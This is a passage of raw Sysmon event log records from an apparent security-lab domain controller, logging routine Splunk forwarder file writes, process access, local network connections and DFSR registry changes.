23542300x80000000000000002201331Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:10.089{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F710C6ECC388FDAFE2419CF9BD8B74DE,SHA256=9819AC649685E54E6A4237F7B7F3449320E485C54574187093E23518B6F940EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201332Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:11.136{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C716ABD12217A19E938D237E7D74676A,SHA256=DE600233232D0105DBE22735CF14A722F0DE9B7BAE54E1991EF4A11FDAE32D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201335Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:12.823{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B317513ED74A84B50BF1A5630CC759A,SHA256=8D286BE1A8C2E819AFEBBF11758E87F9E8F60441913013E0A11BB6A22A985D80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201334Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:12.823{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4610EA0B09B0660AE25FD40F7F8A0F5E,SHA256=644C69CF048279FB6C55831EE43E29065453CEB43E1CE1B19E78E01693B63EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201333Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:12.151{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA20D02DE6E25930FBC7ACC4BF0A4C79,SHA256=D11936CCA19A5F94B495F7EC191E3ADB28D2B6FB3EFA098B8CF3F676B71BEA5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201336Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:13.167{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5462693C77279A94FBF298EF0D5A9E1,SHA256=E2EE61478C23F1F1D1BC6A2393AB92EBB6CD96D9EE8055EA92B48EADB4894F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201339Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:14.714{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B317513ED74A84B50BF1A5630CC759A,SHA256=8D286BE1A8C2E819AFEBBF11758E87F9E8F60441913013E0A11BB6A22A985D80,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201338Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:09.925{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55205-false10.0.1.12-8000- 23542300x80000000000000002201337Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:14.183{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EE0AEC714628B290EF6AAE7E1D736D2,SHA256=5B9928D1AE858D5D75F7993885A91739FA09D987C8223885684DE9CBD8C3C6E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201340Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:15.198{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=498AA46C4645F95D45284BC5A204482D,SHA256=EE2B9F99CCB0247923736C50554F77119C9AB5ADB3D9930D67298E1142D6BCE8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201343Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:11.364{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55206-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002201342Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:11.364{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55206-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 23542300x80000000000000002201341Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:16.214{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB52DE8F82DBEF2F858DA3CC65C9099,SHA256=B7E7AAB61A649C3909267940C558AB12EC17FE4B4C73E734B95AE67038C05365,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201353Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.683{5ABCFE62-E779-6040-FE4D-00000000AD01}70602632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201352Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E779-6040-FE4D-00000000AD01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201351Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201350Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201349Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201348Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201347Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E779-6040-FE4D-00000000AD01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201346Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.542{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E779-6040-FE4D-00000000AD01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201345Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.543{5ABCFE62-E779-6040-FE4D-00000000AD01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201344Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:17.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E2156D664F5E4DA9B8CECF7C4DA6AFF,SHA256=63F657B2A7FDA94215A14DA1A33644BD9C09AAB3C20E02A0EC5603EF4721A7DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201374Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E77A-6040-004E-00000000AD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201373Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201372Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201371Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201370Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201369Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E77A-6040-004E-00000000AD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201368Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E77A-6040-004E-00000000AD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201367Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.886{5ABCFE62-E77A-6040-004E-00000000AD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000002201366Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:58:18.589{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\20FED10E-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_20FED10E-0000-0000-0000-100000000000.XML 13241300x80000000000000002201365Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:58:18.589{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Config SourceDWORD (0x00000001) 13241300x80000000000000002201364Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:58:18.589{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0992B788-1468-4F36-93BE-112B21933E91.XML 23542300x80000000000000002201363Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=092849F7E10197A15CE11B1A4B7F173D,SHA256=EE687FA5A712C7807F035C3FBE52482C092D63E1693966EE3EE83C234732BDA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201362Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0A1A4AD51DE8EBAEBB01B928D7ADA2F,SHA256=139C017D1D70012A6B3E547BCF98AD628DC444595866516A0E9C730D4384879F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201361Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:18.214{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E77A-6040-FF4D-00000000AD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201360Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 